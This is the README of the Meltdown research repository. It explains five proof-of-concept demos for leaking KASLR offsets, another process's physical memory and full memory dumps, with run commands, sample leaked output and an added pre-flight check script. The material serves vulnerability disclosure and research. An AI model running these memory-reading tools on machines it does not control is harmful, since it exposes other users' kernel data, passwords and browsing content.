IAIK/meltdown
This repository contains several applications demonstrating the Meltdown bug. For technical information about the bug, refer to the paper:
- Meltdown by Lipp, Schwarz, Gruss, Prescher, Haas, Mangard, Kocher, Genkin, Yarom, and Hamburg
The applications in this repository are built with libkdump, a library we developed for the paper. This library simplifies exploitation of the bug by automatically adapting to certain properties of the environment.
Videos
This repository contains two videos demonstrating Meltdown.
Demos
This repository contains five demos to demonstrate different use cases. All demos are tested on Ubuntu 16.04 with an Intel Core i7-6700K, but they should work on any Linux system with any modern Intel CPU since 2010.
For best results, we recommend a fast CPU that supports Intel TSX (e.g. any Intel Core i7-5xxx, i7-6xxx, or i7-7xxx).
Furthermore, every demo should be pinned to one CPU core, e.g. with taskset.
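As an added pre-flight check (not part of this repository), the following POSIX shell functions inspect the three environment properties the demos depend on: the kernel's own Meltdown status report (the sysfs file exists on Linux 4.15 and later, which is an assumption here), whether KASLR was disabled with nokaslr on the kernel command line (needed by demos 3 to 5 unless you pass the direct physical map offset), and whether the CPU advertises TSX (the rtm flag in /proc/cpuinfo). File paths are parameters so the check can also be run against saved copies of those files.

```sh
#!/bin/sh
# Added pre-flight check for the demos in this repository (not part of IAIK/meltdown).
# Every function takes an optional file path; the defaults are the live kernel files.

# Kernel self-report (assumes Linux 4.15+, which added the vulnerabilities directory).
# Prints one of:
#   vulnerable  - kernel reports Meltdown as exploitable (the demos can work)
#   mitigated   - e.g. "Mitigation: PTI": kernel pages are unmapped in user mode,
#                 so the demos are expected to fail
#   unaffected  - CPU reported as not affected
#   unknown     - file missing (older kernel): no verdict possible
meltdown_status() {
    f="${1:-/sys/devices/system/cpu/vulnerabilities/meltdown}"
    [ -r "$f" ] || { echo unknown; return 0; }
    case "$(cat "$f")" in
        "Not affected"*) echo unaffected ;;
        Mitigation*)     echo mitigated ;;
        Vulnerable*)     echo vulnerable ;;
        *)               echo unknown ;;
    esac
}

# Demos 3-5 need either the direct physical map offset or "nokaslr" on the
# kernel command line. Returns 0 (true) when nokaslr is present as a whole token.
kaslr_disabled() {
    f="${1:-/proc/cmdline}"
    [ -r "$f" ] && tr ' ' '\n' < "$f" | grep -qx nokaslr
}

# TSX (recommended for best results) is advertised as the "rtm" CPU flag.
tsx_supported() {
    f="${1:-/proc/cpuinfo}"
    [ -r "$f" ] && grep '^flags' "$f" | head -n 1 | tr ' ' '\n' | grep -qx rtm
}

# One-line summary, e.g. "meltdown=mitigated kaslr=on tsx=yes".
# Arguments: meltdown status file, kernel command line file, cpuinfo file.
preflight() {
    k=on; kaslr_disabled "$2" && k=off
    t=no; tsx_supported "$3" && t=yes
    echo "meltdown=$(meltdown_status "$1") kaslr=$k tsx=$t"
}
```

Run `preflight` with no arguments on the machine under test; a result of meltdown=mitigated explains a failing demo #1 without pointing at the timer or CPU.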
Demo #1: A first test (test)
This is the most basic demo. It uses Meltdown to read accessible addresses from its own address space, not breaking any isolation mechanisms.
If this demo does not work for you, the remaining demos most likely will not work either. The reasons are manifold, e.g., the CPU could be too slow, not support out-of-order execution, the high-resolution timer is not precise enough (especially in VMs), the operating system does not support custom signal handlers, etc.
Build and Run
If you see an output similar to this
Expect: Welcome to the wonderful world of microarchitectural attacks
Got: Welcome to the wonderful world of microarchitectural attacks
then the basic demo works.
Demo #2: Breaking KASLR (kaslr)
Starting with Linux kernel 4.12, KASLR (Kernel Address Space Layout Randomization) is active by default. This means that the location of the kernel (and also the direct physical map, which maps the entire physical memory) changes with every reboot.
This demo uses Meltdown to leak the (secret) randomization of the direct physical map. This demo requires root privileges to speed up the process. The paper describes a variant which does not require root privileges.
Build and Run
make
sudo taskset 0x1 ./kaslr
After a few seconds, you should see something similar to this
[+] Direct physical map offset: 0xffff880000000000
Demo #3: Reliability test (reliability)
This demo tests how reliably physical memory can be read. For this demo, you either need the direct physical map offset (e.g. from demo #2) or you have to disable KASLR by specifying nokaslr on your kernel command line.
Build and Run
Build and start reliability. If you do not have KASLR disabled, the first parameter is the offset of the direct physical map. Otherwise, the program does not require a parameter.
make
sudo taskset 0x1 ./reliability
After a few seconds, you should get an output similar to this:
[-] Success rate: 99.93% (read 1354 values)
Demo #4: Read physical memory (physical_reader)
This demo reads memory from a different process by directly reading physical memory. For this demo, you either need the direct physical map offset (e.g. from demo #2) or you have to disable KASLR by specifying nokaslr on your kernel command line.
In principle, this program can read arbitrary physical addresses. However, as the physical memory contains a lot of non-human-readable data, we provide a test tool (secret), which places a human-readable string into memory and directly provides the physical address of this string.
Build and Run
For the demo, first run secret (as root) to get the physical address of a human-readable string:
It should output something like this:
[+] Secret: If you can read this, this is really bad
[+] Physical address of secret: 0x390fff400
[+] Exit with Ctrl+C if you are done reading the secret
Leave the secret program running, and start physical_reader. The first parameter is the physical address printed by secret. If you do not have KASLR disabled, the second parameter is the offset of the direct physical map.
taskset 0x1 ./physical_reader 0x390fff400
After a few seconds, you should get an output similar to this:
[+] Physical address : 0x390fff400
[+] Physical offset : 0xffff880000000000
[+] Reading virtual address: 0xffff880390fff400
If you can read this, this is really bad
Demo #5: Dump the memory (memdump)
This demo dumps the content of the memory. Like demo #3 and #4, it uses the direct physical map to dump the contents of the physical memory in a hexdump-like format.
Again, as the physical memory contains a lot of non-human-readable content, we provide a test tool to fill large parts of the physical memory with human-readable strings.
Build and Run
For the demo, first run memory_filler to fill the memory with human-readable strings. The first argument is the amount of memory (in gigabytes) to fill.
Then, run the memdump tool to dump memory contents. If you executed memory_filler before, you should see some string fragments.
If you have Firefox or Chrome with multiple tabs running, you might also see parts of the websites which are open or have been recently closed.
The first parameter is the physical address at which the dump should start (leave empty to start at the first gigabyte). If you do not have KASLR disabled, the second parameter is the offset of the direct physical map.
taskset 0x1 ./memdump 0x240000000 # start at 9 GB
You should get a hexdump of parts of the memory (potentially even containing secrets such as passwords, see the example in the paper), e.g.:
240001c9f: | 00 6d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | .m.............. |
24000262f: | 00 7d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | .}.............. |
24000271f: | 00 00 00 00 00 00 00 00 00 00 00 00 65 6e 20 75 | ............en u |
24000272f: | 73 65 72 20 73 70 61 63 65 20 61 6e 64 20 6b 65 | ser space and ke |
24000273f: | 72 6e 65 6c 57 65 6c 63 6f 6d 65 20 74 6f 20 74 | rnelWelcome to t |
24000298f: | 00 61 72 79 20 62 65 74 77 65 65 6e 20 75 73 65 | .ary between use |
24000299f: | 72 20 73 70 61 63 65 20 61 6e 64 20 6b 65 72 6e | r space and kern |
2400029af: | 65 6c 42 75 72 6e 20 61 66 74 65 72 20 72 65 61 | elBurn after rea |
2400029bf: | 64 69 6e 67 20 74 68 69 73 20 73 74 72 69 6e 67 | ding this string |
240002dcf: | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 | ................ |
2400038af: | 6a 75 73 74 20 73 70 69 65 64 20 6f 6e 20 61 00 | just spied on a. |
240003c8f: | 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ |
24000412f: | 00 00 00 00 00 00 00 00 00 00 00 00 65 74 73 2e | ............ets. |
24000413f: | 2e 2e 57 65 6c 63 6f 6d 65 20 74 6f 20 74 68 65 | ..Welcome to the |
2400042ff: | 00 00 00 00 00 00 00 00 00 6e 67 72 61 74 75 6c | .........ngratul |
24000430f: | 61 74 69 6f 6e 73 2c 20 79 6f 75 20 6a 75 73 74 | ations, you just |
24000431f: | 20 73 70 69 65 64 20 6f 6e 20 61 6e 20 61 70 70 |  spied on an app |
Warnings
Warning #1: We are providing this code as-is. You are responsible for protecting yourself, your property and data, and others from any risks caused by this code. This code may cause unexpected and undesirable behavior to occur on your machine. This code may not detect the vulnerability on your machine.
Warning #2: If you find that a computer is susceptible to the Meltdown bug, you may want to avoid using it as a multi-user system. Meltdown breaches the CPU's memory protection. On a machine that is susceptible to the Meltdown bug, one process can read all pages used by other processes or by the kernel.
Warning #3: This code is only for testing purposes. Do not run it on any productive systems. Do not run it on any system that might be used by another person or entity.